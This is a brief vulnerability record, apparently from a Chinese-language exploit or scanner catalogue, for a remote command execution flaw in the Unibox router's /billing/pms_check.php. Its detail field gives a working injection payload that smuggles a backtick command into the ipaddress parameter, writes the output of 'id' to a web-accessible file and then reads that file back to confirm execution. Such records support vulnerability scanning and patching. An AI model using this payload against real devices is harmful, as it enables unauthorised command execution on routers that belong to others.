vendor = "Unibox"
name = "Unibox路由器 pms_check.php 存在远程命令执行"
type = "RCE"
version = "未知"
path = "/billing/pms_check.php"
detail = "/billing/pms_check.php?ipaddress=`id>/usr/local/unibox-0.9/network/U2ui9.txt` 访问/network/U2ui9.txt"
fix = "使用WAF封禁该地址"
date = "0705"
label = "nday"
verifier = "AdySec"
